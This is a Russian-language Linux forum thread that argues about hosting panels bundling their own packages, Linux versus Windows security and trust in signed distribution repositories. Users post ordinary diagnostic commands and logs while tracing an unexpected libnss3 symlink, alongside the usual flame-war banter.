> виноват ли RHEL/CentOS.к сожалению они не готовы отвечать за кучу левых маинтейнеров - которые ломают зависимости между пакетами. И поддерживать весь этот зоопарк. Гораздо проще ставить свои пакеты, и их поддерживать.
Ну что ж - это обратная сторона "многосторонности" и "разнообразия" в linux.
Кушайте...
Хотите сказать, что в RHEL чаще ломают совместимость, чем в CPanel?
я хочу сказать что cPannel подерживает не только RHEL, а еще SLES, Debian и прочие.
Посему для них значительно проще - иметь одну пакетную базу на весь этот зоопарк.
И это не считая всяких RedHat клонов,: какждый из которых наровит собрать иначе и получается что разные зависимости и разные версии. Головняк с поддержкой этого зоопарка понятен ?
Или опять - "у меня на localhost все клева".
> Головняк с поддержкой этого зоопарка понятен ?Нет.
а pappet (и не только) тоже кучу всего поддерживает и чё?
и с успехом м.б. использован для управления парком серверов...
> я хочу сказать что cPannel подерживает не только RHEL, а еще
> SLES, Debian и прочие.
> Посему для них значительно проще - иметь одну пакетную базу на весь
> этот зоопарк.
> И это не считая всяких RedHat клонов,: какждый из которых наровит собрать
> иначе и получается что разные зависимости и разные версии. Головняк с
> поддержкой этого зоопарка понятен ?
> Или опять - "у меня на localhost все клева".Взять, к примеру, DirectAdmin , который тянет с собой кучу г., но тянет он все это через sh скрипты, которые элементарно правятся. В итоге: один раз разобрался, переписал и теперь все новые сервера ставятся не с самосбором от DirectAdmin-овцев.
Это я к тому, что: кто хочет, тот сделает, это касается и DirectAdmin-овцев и админов.
Кстати ISPmanager не стремается использоваться ту пакетную систему, что принята в конкретном дистрибутиве/ОС.
>[оверквотинг удален]
>> поддержкой этого зоопарка понятен ?
>> Или опять - "у меня на localhost все клева".
> Взять, к примеру, DirectAdmin , который тянет с собой кучу г., но
> тянет он все это через sh скрипты, которые элементарно правятся. В
> итоге: один раз разобрался, переписал и теперь все новые сервера ставятся
> не с самосбором от DirectAdmin-овцев.
> Это я к тому, что: кто хочет, тот сделает, это касается и
> DirectAdmin-овцев и админов.
> Кстати ISPmanager не стремается использоваться ту пакетную систему, что принята в конкретном
> дистрибутиве/ОС.потом выяснилось что в твоих любимых версиях не такой формат конфига - и привет...
> потом выяснилось что в твоих любимых версиях не такой формат конфига -
> и привет...Вот уже пять лет выясняется и все выяснится не может.
>> потом выяснилось что в твоих любимых версиях не такой формат конфига -
>> и привет...
> Вот уже пять лет выясняется и все выяснится не может.ты 5 лет не ставиш новый софт и сам следишь за обновлениями безопасности ? мне тебя жалко :-)
Бедный солярочник, так соляркой^W батхертом истекает. Даже ник с досады нацепил и ср@т в каждой ветке про линукс. Только соляре вот все это уже не поможет - скажи спасибо своему ораклю за это. Их эффективные манагеры явно застряли в прошлом веке в своих понятиях о жизни.
>>к сожалению они не готовы отвечать за кучу левых маинтейнеров - которые ломают зависимости между пакетами. И поддерживать весь этот зоопарк. Гораздо проще ставить свои пакеты, и их поддерживать.IMHO проблема как раз таки RHEL/CentOS, потому что с пакетами, идущими в стандартной поставке этих систем (особенно версии 5.x) в любом случае приходится подключать сторонние репозитории или собирать свои рпмки, сорцы которых таки качаются со сторонних ресурсов.
> Ну что ж - это обратная сторона "многосторонности" и "разнообразия" в linux.
> Кушайте...Это обратная сторона безграмотности. И я бы не прочь, чтобы они и не приближались к свободному ПО.
А по факту получается, что они создают проблемы только сами себе и тем, кого удалось зацепить, а нормальных людей это вообще никак не касается, потому что они в здравом уме себе такое не поставят.
ps. Скачал дерево pkgsrc, собрал пакет для netbsd i386, оттуда же собрал пакет для wheezy amd64. Работает, и не ругается на какие-то несовместимости. Так что даже между ОС есть переносимость, и между архитектурами.
> ps. Скачал дерево pkgsrc, собрал пакет для netbsd i386, оттуда же собрал
> пакет для wheezy amd64. Работает, и не ругается на какие-то несовместимости.
> Так что даже между ОС есть переносимость, и между архитектурами.собственно поэтому меня радуют гибридные дистры: ядро BSD окружение linux и наоборот - на выходе патчи про совместимость. всё же сила *nix в сочетании единства и многообразия.
> Ну что ж - это обратная сторона "многосторонности" и "разнообразия" в linux.
> Кушайте...Ну вон в виндоусе нет никакого разнообраизя. Что не мешает хакерью его долбать. Вплоть до remote kernelmode через закрытые (!!!) udp порты который не так давно починили. Так что ваш тезис выглядит, кхм, несколько притянутым за уши. Ну вон винде же это не помогло почему-то.
А что, кто-то уже взломал? Там нужно было отправить 2^32 пакетов на неиспользуемый порт, явно разрешённый администратором, но никем не используемый.
> А что, кто-то уже взломал?Судя по тому что постоянно прорва спама и сотни тысяч хостов в ботнетах - это вообще перманентное состояние виндов.
> Там нужно было отправить 2^32 пакетов на неиспользуемый порт
У автоматических троянов времени и траффика много, они же не за свой счет пашут. Вон мсбласт летал путем тупого сканирования диапазонов айпишников, ему хватало.
> В венде программ намного больше чем в линапсесемьдесят два миллиона троянов. linux завидует стоя.
> В линапс пришли игры, а где игры там и трояны.Не знаю, дадут ли мне премию, или придётся язык показывать, но я, кажется, понял.
Когда тупость умножают на бесконечность, получается виндузятник.
> Когда задротство умножают на кривые руки получаются линyпcятник :-)А вы получаетесь трололо. При том довольно жирным. А кто на такой троллинг ведется - тот лол.
> А вы получаетесь трололо. При том довольно жирным.Да оставьте уже пенсионера в покое -- может, давление за бортом штормит, вот его и плющит.
>> А вы получаетесь трололо. При том довольно жирным.
> Да оставьте уже пенсионера в покое -- может, давление за бортом штормит,
> вот его и плющит.Мне до пенсии не далеко но и не так уж и близко :-)
>>> А вы получаетесь трололо. При том довольно жирным.
>> Да оставьте уже пенсионера в покое -- может, давление за бортом штормит,
>> вот его и плющит.
> Мне до пенсии не далеко но и не так уж и близкоИногда маразм приходит ещё до пенсии, иногда он врождённый. так что твой случай не такой уж и уникальный.
> Иногда маразм приходит ещё до пенсии, иногда он врождённый. так что твой
> случай не такой уж и уникальный.Я уже много раз говорил простую вещь, которая давно известна социологам - в маргинальных группировках типа линуксовой непропорционально большой процент социопатов и полировщиков пупка :-)
>> Иногда маразм приходит ещё до пенсии, иногда он врождённый. так что твой
>> случай не такой уж и уникальный.
> Я уже много раз говорил простую вещь, которая давно известна социологам -
> в маргинальных группировках типа линуксовой непропорционально большой процент социопатов
> и полировщиков пупка :-)Потому что они лучшие, в отличии от серой массы быдла.
> Потому что они лучшие, в отличии от серой массы быдла.Скорее потому, что есть реальная возможность заглянуть к разработчикам. Причём, скорее всего, это общий срез всех разработчиков, но... проприетарщину выпускает лейбл, где миллионы вбуханы в то, чтобы поверх этого создать глянец (только уши иногда торчат), а в открытых проектах всё честно: вот разработчик, а вот его проект.
Кроме того, тогда было бы непонятно, как эти люди умудряются договариваться, взаимодействовать, работать сообща? :) По подвалам сидят как раз проприетарные разработчики, причём продавцам практически всё равно, что они напишут - они и так продадут, а обратной связи нет никакой, поэтому не разработчики исполняют потребности пользователей, а пользователи исполняют потребности продавцов. :)
Кто-нибудь вообще хоть раз мог предъявить претензию разработчику Windows или msOffice? Где они? В каких подвалах? :)
> Кто-нибудь вообще хоть раз мог предъявить претензию разработчику Windows или msOffice?
> Где они? В каких подвалах? :)Открой usenet а в нем группы мелкософта. Там довольно часто мелькают работники службы то ли поддержки то ли еще какой.
> Потому что они лучшие, в отличии от серой массы быдла.Это совершенно стандартное их оправдание :-) Употребление словечка "быдло" это своего рода неопровергаемый критерий принадлежности к "небыдлу" (тм) , а это уже такая хрень, что о ней и вовсе неинтересно говорить
> в маргинальных группировках типа линуксовой непропорционально большой процент социопатов
> и полировщиков пупка :-)Вот я и думаю - в каую из этих категорий вас записать? Кажется, сразу в обе? А то поразвели какого-то тупого да еще и жирного троллинга к тому же на весь форум. Ну чем не социопатия и полировка пупка?
> Вот я и думаю - в каую из этих категорий вас записать?
> Кажется, сразу в обе? А то поразвели какого-то тупого да еще
> и жирного троллинга к тому же на весь форум. Ну чем
> не социопатия и полировка пупка?Записывайте в какую больше нравится :-)
> Записывайте в какую больше нравится :-)Тогда в обе, вроде все критерии на месте :)
> Сдуру можно и х.. сломать, но зачем это делать ? :-) В
> линапс пришли игры, а где игры там и трояны.Пусть школьники в свои уютные убунточки ставят трояны, всем пофиг. Речь о серверах.
> Пусть школьники в свои уютные убунточки ставят трояны, всем пофиг. Речь о
> серверах.Так и сервера на нем ломают Безупречных систем нет в природе.
> Так и сервера на нем ломают Безупречных систем в природе.кто-то говорил обратное? безопасность это не характеристика дистра. это процесс. если вас задевают чьи-то слова про то, что линукс безопаснее венды, попробуйте разобраться почему. ИМХО потому что в *nix этот процесс не тормозится скрытыми исходниками. если не поняли - вопрос в том, что security by obscurity нравится далеко не всем и для этого есть основания. напротив, быстрая публикация уязвимостей и патчей, большая вариация дистров как комбинации ядер/библиотек/софта/стиля работы разработчиков многими ценится. вплоть до того что всегда можно выбрать ту комбинацию, которую ты считаешь наиболее адекватной задачам. венда такой свободы не даёт, увы.
Эмм, где то видел что уязвимости быстрее устраняются в винде. Что же касается зоопарка, это скорее минус а не плюс. Одну систему проще сопровождать.
ЗЫ Меня не задевают ровно потому что сам пишу из под слаки :-) Просто не люблю узколобых фанатиков, а их, к сожалению, в линуксе полно.
> Эмм, где то видел что уязвимости быстрее устраняются в винде.Это сложно проверить. И поверить в это тем более сложно. При условии что каждый установленный софт тащит в систему свои либы со своими дырками, сам себя пытается обновлять своим собственным велосипедным способом. Напрочь отсутствует проверка сырцов "со стороны". Вот например во freebsd есть security team и система пометки портов как уязвимые/были уязвимыми. в венде сторонний софт - это жуткий дикий зоопарк: начиная со способа установки (откуда скачал, то и поставил) и заканчивая сопровождением: если разработчик забил болт на разработку/обновление - узнать об этом можно получив на борт "аддон" и поработав в ботнете на дядю.
> Что же касается зоопарка, это скорее минус а не плюс. Одну систему проще сопровождать.
никто не заставляет устраивать копию зоопарка в организации. как раз наоборот - в организации можно сделать всё единообразно. а вот для разработчика малвари это дополнительная сложность.
> ЗЫ Меня не задевают ровно потому что сам пишу из под слаки :-) Просто не люблю узколобых фанатиков, а их, к сожалению, в линуксе полно.кто ж их любит-то. но коричневого вещества в трубах тут и так хватает без дополнительного вендотроллинга :)
> Эмм, где то видел что уязвимости быстрее устраняются в винде.Это с фиксами раз в месяц то? А хакерье точно этот месяц изволит ждать, пока майкрософтушка свои патчики оттестирует и всей группой выгрузит? :)
> Что же касается зоопарка, это скорее минус а не плюс. Одну систему проще сопровождать.
Спасибо, видел я как виндовые админы майкрософтовский виртуализатор сопровождают. Вот это я понимаю - хардкор и содомия.
> Это с фиксами раз в месяц то? А хакерье точно этот месяц
> изволит ждать, пока майкрософтушка свои патчики оттестирует и всей группой выгрузит?
> :)Чего то я не понял, кто то каждый день пересобирает ядро с mainline апдейтами ?
Нет. Но апдейт прилетает сразу по готовности фикса. А там уже ответственность админов - решить, когда можно обновить софт. И это не только ядро, кстати, многое перезапускается моментально.
> Чего то я не понял, кто то каждый день пересобирает ядро с
> mainline апдейтами ?http://packages.altlinux.org/ru/Sisyphus/srpms/kernel-image-...
>> Чего то я не понял, кто то каждый день пересобирает ядро с
>> mainline апдейтами ?
> http://packages.altlinux.org/ru/Sisyphus/srpms/kernel-image-...Это сизиф
> Чего то я не понял, кто то каждый день пересобирает ядро с mainline апдейтами ?Не, такой опции там не дадено. Но вот ежедневные глюки - разруливают, да. Постоянно что-то факапается без каких либо видимых причин. Просто очень глюкавая в целом конструкция. При том никто не знает что и почему глючит. Видел несколько потуг индусни из саппортов собрать с ынтырпрайзов логи и прочая. Но насколько я знаю, толку было ноль. По крайней мере, за несколько лет как-то сильно менее глюкавым оно не стало. Вообще же я не понимаю как можно такую пре-альфа-версию вываливать энтерпрайзным клиентам.
> Пусть школьники в свои уютные убунточки ставят трояны, всем пофиг. Речь о серверах.Чего-то не видно в уютных убунточках троянов. ЧЯДНТ?
> линапс пришли игры, а где игры там и трояны.Врядли валв будет отгружать тем кто честно заплатил трояны. А если кто качает варез с торентов (много ты линуксоидов таких видел?) - так ему и надо форматцэ делать по максимуму. Для включения совести.
> А если кто
> качает варез с торентов (много ты линуксоидов таких видел?) - так
> ему и надо форматцэ делать по максимуму. Для включения совести.Тыц - http://rutracker.org/forum/viewforum.php?f=1381
Цифирки скачиваний вроде как чего то говорят :-)
> Цифирки скачиваний вроде как чего то говорят :-)Да, что варезников среди линуксоидов немного. Вообще про это Каганов хорошо так написал.
> Да, что варезников среди линуксоидов немного. Вообще про это Каганов хорошо так
> написал.Больше всего там скачивают вещи, которые на локалхосте вообще то не нужны. И это тоже о многом говорит .. :-)
>> Да, что варезников среди линуксоидов немного. Вообще про это Каганов хорошо так
>> написал.
> Больше всего там скачивают вещи, которые на локалхосте вообще то не нужны.
> И это тоже о многом говорит .. :-)А потом посчитать, сколько с подобных сайтов скачано дистрибутивов Linux, прикинуть, кто качает с подобных сайтов, посмотреть в словарике слово "корреляция" и сделать вывод.
Наличие red hat в виртуалке ещё не наделяет человека свободным мышлением. :)
> А потом посчитать, сколько с подобных сайтов скачано дистрибутивов Linux, прикинуть, кто
> качает с подобных сайтов,Ну, вообще то если на локалхосте эти вещи не нужны, то их качают линуксовые админы, а тут уже соовсем другая корреляция получается :-)
>> А потом посчитать, сколько с подобных сайтов скачано дистрибутивов Linux, прикинуть, кто
>> качает с подобных сайтов,
> Ну, вообще то если на локалхосте эти вещи не нужны, то их
> качают линуксовые админы, а тут уже соовсем другая корреляция получается :-)см. выше про хостинг-панели.
в суровой реальности такого не замечено.
> маинтейнеров - которые ломают зависимости между пакетамиА вы не используйте нестабильные отладочные версии.
[offtop]
>Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.а вы всё ещё считаете что ваши репозитории в безопасноти ? и вашему линуксу не нужна защита одних программ от других программ ? тогда мы идём к вам[/offtop]
> [offtop]а вы всё ещё считаете что ваши репозитории в безопасноти ? и
> вашему линуксу не нужна защита одних программ от других программ ?
> тогда мы идём к вам[/offtop]У каждого пакета, который подписан gpg-ключом, есть КОНКРЕТНЫЙ ОТВЕТСТВЕННЫЙ. И если он что-то просунет, то ему, соответственно, коллектив тоже чего-нибудь просунет. Нельзя ничего просунуть тайно, что не стало бы явным.
>> [offtop]а вы всё ещё считаете что ваши репозитории в безопасноти ? и
>> вашему линуксу не нужна защита одних программ от других программ ?
>> тогда мы идём к вам[/offtop]
> У каждого пакета, который подписан gpg-ключом, есть КОНКРЕТНЫЙ ОТВЕТСТВЕННЫЙ. И если он
> что-то просунет, то ему, соответственно, коллектив тоже чего-нибудь просунет. Нельзя ничего
> просунуть тайно, что не стало бы явным."когда вас поимели - поздно предохраняться презервативами и пора пить постинор" - вам уже будет "всё равно", ваши ключи от квартиры уже у хацкеров
и от того что кому-то за это будут накручивать кишки на шею вам станет легче ?
> "когда вас поимели - поздно предохраняться презервативами и пора пить пастинор" - вам уже будет "всё равно", ваши ключи от квартиры уже у хацкерови от того что кому-то за это будут накручивать кишки на шею вам станет легче ?
У маинтайнера нет мотивации что-то подкладывать мне в репозиторий. Скорее, меня машина собъёт на балконе, чем я подобного нелепого способа самоубийства дождусь от маинтайнера.
>> "когда вас поимели - поздно предохраняться презервативами и пора пить постинор" - вам уже будет "всё равно", ваши ключи от квартиры уже у хацкеров
> и от того что кому-то за это будут накручивать кишки на шею
> вам станет легче ?
> У маинтайнера нет мотивации что-то подкладывать мне в репозиторий. Скорее, меня машина
> собъёт на балконе, чем я подобного нелепого способа самоубийства дождусь от
> маинтайнера.комп мантейнера / сервер репов подвержены взлому
взломали сервер, выдали ключик, сделали новую версию пакета, подписали новым ключиком, чего вам ещё не хватает для счастья ?
> комп мантейнера / сервер репов подвержены взлому
> взломали сервер, выдали ключик, сделали новую версию пакета, подписали новым ключиком,
> чего вам ещё не хватает для счастья ?Проще бомбу в урну подложить.
Вероятность, разумеется, есть, но она настолько мала, что не доверять маинтайнером - это как уехать жить в Антаркдиду подальше от бомб... и получить по кумполу метеоритом каким-нибудь.
Если кто-то не понимает разницы между принципами открытости и принципом чёрного ящика, то я объяснять не собираюсь.
> Если кто-то не понимает разницы между принципами открытости и принципом чёрного ящика,
> то я объяснять не собираюсь.а причём здесь это ?
> а причём здесь это ?При том что те же дебианщики например дотошно мониторят все патчи между версиями пакетов. И желающие проверять - велкам сами качнуть сорец и изучать. А вот когда какие-то мутные блобмейкеры предлагают им верить на слово - вот еще не хватало.
> При том что те же дебианщики например дотошно мониторят все патчи между
> версиями пакетов. И желающие проверять - велкам сами качнуть сорец и
> изучать. А вот когда какие-то мутные блобмейкеры предлагают им верить на
> слово - вот еще не хватало.вот вам дебиан http://www.opennet.me/openforum/vsluhforumID3/88727.html#85
>> При том что те же дебианщики например дотошно мониторят все патчи между
>> версиями пакетов. И желающие проверять - велкам сами качнуть сорец и
>> изучать. А вот когда какие-то мутные блобмейкеры предлагают им верить на
>> слово - вот еще не хватало.
> вот вам дебиан http://www.opennet.me/openforum/vsluhforumID3/88727.html#85Ничего подобного в пакете libnss3 нет. Он вообще не создаёт никакие симлинки, постинсталл там выглядит вот так:
#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
ldconfig
fiи в пакете нет никаких симлинков.
>[оверквотинг удален]
>>> слово - вот еще не хватало.
>> вот вам дебиан http://www.opennet.me/openforum/vsluhforumID3/88727.html#85
> Ничего подобного в пакете libnss3 нет. Он вообще не создаёт никакие симлинки,
> постинсталл там выглядит вот так:
> #!/bin/sh
> set -e
> if [ "$1" = "configure" ]; then
> ldconfig
> fi
> и в пакете нет никаких симлинков.зато симлинки создает ldconfig.
> зато симлинки создает ldconfig.Ну спасибо, Капитан. А какой в этом криминал то? Я конечно вижу как два клоуна старательно пытаются "дело шить", но лыжи у клоунов что-то не едут. Т.к. дело разваливается, клоуны даже не могут объяснить в чем, собственно, криминал.
>[оверквотинг удален]
>>> слово - вот еще не хватало.
>> вот вам дебиан http://www.opennet.me/openforum/vsluhforumID3/88727.html#85
> Ничего подобного в пакете libnss3 нет. Он вообще не создаёт никакие симлинки,
> постинсталл там выглядит вот так:
> #!/bin/sh
> set -e
> if [ "$1" = "configure" ]; then
> ldconfig
> fi
> и в пакете нет никаких симлинков.а ещё есть cat ..../ca-certificates_20120623_all.deb/usr/sbin/update-ca-certificates |grep ln
ln -sf "$CERT" "$PEM"
который вероятно может создавать ошибочные линки http://www.mail-archive.com/debian-bugs-dist@lists.debi...
вы поручитесь что он не создаёт ? я вот пока не разобрался
> комп мантейнера / сервер репов подвержены взлому
> взломали сервер, выдали ключик, сделали новую версию пакета, подписали новым ключиком,
> чего вам ещё не хватает для счастья ?Ну если мантейнер не способен увидеть, что вчера у него был один ключик, а сегодня — сюрприз — он почему-то изменился, то зачем такой мантейнер нужен.
Такое ощущение, что вы мантейнеров за домохозяек держите. И программистов среди них нет, и взломать их очень просто, и вирусов накидать, и ключи подменить, и кредитку обчистить.
А мужики-то и не знают!
> взломали сервер, выдали ключик,И как этот ключик у меня в списке доверяемых окажется, интересно? А нормальные майнтайнеры не хранят на серверах с пакетами ключ которым они их подписывают, приколитесь?
> "когда вас поимели - поздно предохраняться презервативами и пора пить пастинор" -Постинор.
Прежде чем постить пафосные и банальные фразы, лучше проверьте правописание неизвестных вам слов.
Говорят, помогает.
> Прежде чем постить пафосные и банальные фразы, лучше проверьте правописание
> неизвестных вам слов. Говорят, помогает.А ещё хорошо бы проверить действие (желательно на себе). Потому как если послушать курс фармакологии, то рекомендации дур с лекций по секспросвету начинают выглядеть совсем иначе.
(для особо тугих извилинами вроде JL2001: употреблять и тем более советовать бездумно гормональные средства -- смерти подобно)
> А ещё хорошо бы проверить действие (желательно на себе).Постинор на женский организм препогано действует.
А если JL2001 мальчик, то я боюсь представить, что с ним от постинора будет.Впрочем, судя по логике и изложению, он его уже попробовал и регулярно принимает.
>> А ещё хорошо бы проверить действие (желательно на себе).
> Постинор на женский организм препогано действует.
> А если JL2001 мальчик, то я боюсь представить, что с ним от
> постинора будет.
> Впрочем, судя по логике и изложению, он его уже попробовал и регулярно
> принимает.вы предполагаете что аборт на женский (и мужской...) организм действует лучше ? (но это обсуждение уже совсем офтоп....)
> вы предполагаете что аборт на женский (и мужской...) организм действует лучше ?Так и подмывает ответить — «Вижу, что нет».
Извините.
> А ещё хорошо бы проверить действие (желательно на себе).А еще лучше - просто рекурсивно слить оффтопичный тред в треш вместо того чтобы поддерживать его.
>> Прежде чем постить пафосные и банальные фразы, лучше проверьте правописание
>> неизвестных вам слов. Говорят, помогает.
> А ещё хорошо бы проверить действие (желательно на себе). Потому как
> если послушать курс фармакологии, то рекомендации дур с лекций по секспросвету
> начинают выглядеть совсем иначе.
> (для особо тугих извилинами вроде JL2001: употреблять и тем более советовать бездумно
> гормональные средства -- смерти подобно)Обрекать нежеланного ребёнка на жизнь гуманнее?
> У каждого пакета, который подписан gpg-ключом, есть КОНКРЕТНЫЙ ОТВЕТСТВЕННЫЙ.Привет арчеводам. У вас там перед недавним подписанием пакетов эти пакеты все перепроверили?
Я лично проверил два.
> Я лично проверил два.Два из скольких?
>> Я лично проверил два.
> Два из скольких?А сколько надо?
Все, очевидно же.
> Все, очевидно же.Когда все делают всё, это называется "проприетарная модель развития". Которая эффективна только в одном случае - если у вас есть лишний миллион безмозглых оправдывающих каждый ваш шаг и рвущих за вас глотку рабов.
Во всех остальных удобнее модель, когда каждый делает своё, и они свободно обмениваются результатами.
>> Все, очевидно же.
> Когда все делают всё, это называется "проприетарная модель развития". Которая эффективна
> только в одном случае - если у вас есть лишний миллион
> безмозглых оправдывающих каждый ваш шаг и рвущих за вас глотку рабов.
> Во всех остальных удобнее модель, когда каждый делает своё, и они свободно
> обмениваются результатами.Мантры, мантры. Снимайте лапшу с ушей.
Но я не имел ввиду, что каждый должен проверять все пакеты, я имел ввиду, что все пакеты должны быть проверены.
>>> Все, очевидно же.
>> Когда все делают всё, это называется "проприетарная модель развития". Которая эффективна
>> только в одном случае - если у вас есть лишний миллион
>> безмозглых оправдывающих каждый ваш шаг и рвущих за вас глотку рабов.
>> Во всех остальных удобнее модель, когда каждый делает своё, и они свободно
>> обмениваются результатами.
> Мантры, мантры. Снимайте лапшу с ушей.То, что воины-клоуны постоянно и ежедневно требуют от ВСЕХ делать ВСЁ, преследует ровно одну цель - уравнять по возможностям развития свободное и проприетарное. Ибо тогда проприетарное будет всегда выигрывать, потому что все будут играть по её правилам.
А вот альтернативы свободному, даже альтернативы такому целостному продукту, как Debian, проприетарное не может в принципе. Поэтому, вместо конкуренции, предпочитает принцип "повторение - мать повторения". Или перекладывания с больной головы на здоровую.
Учение Ленина (см. статью "как организовать соцсоревнование") и Эрика Реймонда (см. "волшебный котёл") верно, и поэтому всесильно. А бесплатные рабы заучены гафкать, и поэтому будут гафкать вне зависимости от логических доводов - от логических доводов у них есть хороший блок, называется безмозглость.
> Но я не имел ввиду, что каждый должен проверять все пакеты, я имел ввиду, что все пакеты должны быть проверены.В debian social contract есть хороший пункт на этот счёт, который всё объясняет.
>[оверквотинг удален]
>>> Во всех остальных удобнее модель, когда каждый делает своё, и они свободно
>>> обмениваются результатами.
>> Мантры, мантры. Снимайте лапшу с ушей.
> То, что воины-клоуны постоянно и ежедневно требуют от ВСЕХ делать ВСЁ, преследует
> ровно одну цель - уравнять по возможностям развития свободное и проприетарное.
> Ибо тогда проприетарное будет всегда выигрывать, потому что все будут играть
> по её правилам.
> А вот альтернативы свободному, даже альтернативы такому целостному продукту, как Debian,
> проприетарное не может в принципе. Поэтому, вместо конкуренции, предпочитает принцип "повторение
> - мать повторения". Или перекладывания с больной головы на здоровую.буратина, ты демагог. Знаешь, почему? Или подсказать? И еще трепло.
> буратина, ты демагог. Знаешь, почему? Или подсказать? И еще трепло.А что ещё может сказать описанный персонаж. "Ты кругом прав, а мы просто марионетки без своего мнения". Ну, если бы описанный персонаж мог бы так сказать, он не был бы описанным персонажем, по определению.
А факты - вещь реальная. Их можно потрогать, скачать, установить. И можно либо уметь пользоваться всеми преимуществами, которые они предоставляют, или не уметь и не пользоваться, либо быть законченным быдлом и не умея, мешать другим. Это всё, на что эти воины-импотенты способны - ломать не строить.
Защита одних программ от других хороша в теории, а на практике приносит столько неудобств, что в большинстве случаев много выгоднее терпеть весьма малый риск взлома.
> Защита одних программ от других хороша в теории, а на практике приносит
> столько неудобств, что в большинстве случаев много выгоднее терпеть весьма малый
> риск взлома.ну вот у меня в корне есть такая прелесть
lrwxrwxrwx 1 root root 36 дек. 5 03:54 /libnss3.so -> /usr/lib/x86_64-linux-gnu/libnss3.so
кто виноват и что делать ? почему какой-то левый пакет имеет права писать в рут ? пусть даже только в момент установки (пц, установочные скрипты ИЗ левого ПАКЕТА запускаются с правами рута - это додуматься ж надо до такого....)
> ну вот у меня в корне есть такая прелесть
> lrwxrwxrwx 1 root root 36 дек. 5 03:54 /libnss3.so ->
> /usr/lib/x86_64-linux-gnu/libnss3.so
> кто виноват и что делать ?выясни через:
yum provides /libnss3.so
если эта команда не даст результатов -- значит [с вероятностью 99.999%] ты сам создал эту символьную ссылку [...и надеюсь теперь тебе стыдно :)]
>> ну вот у меня в корне есть такая прелесть
>> lrwxrwxrwx 1 root root 36 дек. 5 03:54 /libnss3.so ->
>> /usr/lib/x86_64-linux-gnu/libnss3.so
>> кто виноват и что делать ?
> выясни через:
> yum provides /libnss3.so
> если эта команда не даст результатов -- значит [с вероятностью 99.999%] ты
> сам создал эту символьную ссылку [...и надеюсь теперь тебе стыдно :)]ознакомьтесь http://www.mail-archive.com/debian-bugs-dist@lists.debi...
у меня похоже аналогичный случайзы: и надеюсь вам стыдно за необоснованные предположения что мне стыдно за то чего я не делал :)
lrwxrwxrwx 1 root root 36 2012-12-05 03:54:21.882307870 +0400 /libnss3.so -> /usr/lib/x86_64-linux-gnu/libnss3.so
zcat /var/log/dpkg.log.2.gz |grep "ca-certificates:all"
2012-12-05 03:54:01 configure ca-certificates:all 20120623 <нет>
2012-12-05 03:54:01 status unpacked ca-certificates:all 20120623
2012-12-05 03:54:01 status half-configured ca-certificates:all 20120623
2012-12-05 03:54:24 status installed ca-certificates:all 20120623
Кто виноват? Виноваты вы. Что делать? Почитать о том, какие права стоят на симлинках и что они значат.
> Кто виноват? Виноваты вы. Что делать? Почитать о том, какие права стоят
> на симлинках и что они значат.а причём тут права ? меня больше волнует вопрос "какого х^W фига либа в корне?"
и я этот симлинк не создавал http://www.opennet.me/openforum/vsluhforumID3/88727.html#85
я всё ещё виноват ?
а что до "левых скриптов" - их же кто-то запустил с соответствующими правами, верно? Угадайте, кто?
> а что до "левых скриптов" - их же кто-то запустил с соответствующими
> правами, верно? Угадайте, кто?а какие варианты ? вот серьёзно - какие дистрибутивы не запускают скрипты идущие внутри пакета от рута ? кроме видимо тех где собираются пакеты из исходников, да и то вроде от рута скрипты при этом пускают, но таких я мало дистрибов щупал
>> а что до "левых скриптов" - их же кто-то запустил с соответствующими
>> правами, верно? Угадайте, кто?
> а какие варианты ? вот серьёзно - какие дистрибутивы не запускают скрипты
> идущие внутри пакета от рута ?Да тот же pkgsrc, который можно на любой дистрибутив установить. Да и многие другие пакетники можно до этого легко доработать - это НЕ проблема. И с рутом проблемы нет, есть проблемы куда серьёзнее.
Левые скрипты, не проверенные маинтайнером и не подписанные ключом дистрибутива? И кто ж такое запускает?А те, что в соответствующих пакетах из репозитория- таки да, это доверенный код. Если будут проблемы - можете проглядеть его глазами, всё открыто. И эта модель в общем показала себя достаточно хорошо для большинства применений. Для более жестких условий есть масса ограничительной механики, но в массовом случае от неё вреда больше чем пользы. Обратная ситуация только там, где коду вообще доверя нет, как в андроиде или в браузере. Ну и особняком Эппл, где ограничения - способ обеспечить контроль за пользователем в основном.
> хотяб пачку презервативов ?.......Так я не понимаю: что мешает ее взять? В том же лине просто искаропки KVM-виртуализатор есть, LXC-контейнеры и чего там еще. Айпитаблес опять же. И что там еще.
...только вам все это не поможет, если вы будете админить сие из винды с варезника где фиг знает чего напихано, наустановив черти-какого вареза с крякерских сайтов, пополам с троянами.
Пачку презервативов до вас применял маинтайнер. И если вы сидите не на федоре какой - всё успели проверить на себе те, кто на федоре, арче и тому подобных, где не так боятся проблем. Так что проблемы, дошедшие до вас - это исключительный случай, обычно (не всегда) не стоящий возни с дополнительной защитой.
> Пачку презервативов до вас применял маинтайнер. И если вы сидите не на
> федоре какой - всё успели проверить на себе те, кто на
> федоре, арче и тому подобных, где не так боятся проблем. Так
> что проблемы, дошедшие до вас - это исключительный случай, обычно (не
> всегда) не стоящий возни с дополнительной защитой.вы в общем-то правы, но случаи бывают разные
можно мне официальный реп vlc последней версии для убунты ? иначе я "просто доверяю" каким-то чувакам с ланчпада...
Для убунты - не знаю, нет её у меня. В дебиане - есть в sid.
> "просто доверяю" каким-то чувакам с ланчпада...Ну так вы и в случае использования vlc "просто доверяете" каким-то там коммитерам vlc, если уж на то пошло.
>> "просто доверяю" каким-то чувакам с ланчпада...
> Ну так вы и в случае использования vlc "просто доверяете" каким-то там
> коммитерам vlc, если уж на то пошло.ну так я только за если vlc будет иметь права на чтение-запись только в папку с видео-музыкой, а про ~/.mozilla/firefox/ чтоб вообще узнать не мог, даже если vlc из "официальных репов дистриба"
На практике вы либо придёте к айпадовской модели "каждому приложению свою копию файла" (что, понятное дело, бред - там одно приложение другому файлы чуть ли не электронной почте шлет) либо задолбаетесь возиться с разрешениями - тут файрфоксом видюшку скачал, тут друг на флешке принес что-то, тут приложение какое-то обратилось к vlc чтобы что-то проиграл, тут папка, синхронизированная с дропбоксом... И т.д.Понимаете, сила современного (или уже не современного?) десктопа как раз в том, что приложения друг о друге знают и могут кооперироваться. И ломать это добровольно - глупо.
> На практике вы либо придёте к айпадовской модели "каждому приложению свою копию
> файла" (что, понятное дело, бред - там одно приложение другому файлы
> чуть ли не электронной почте шлет) либо задолбаетесь возиться с разрешениями
> - тут файрфоксом видюшку скачал, тут друг на флешке принес что-то,
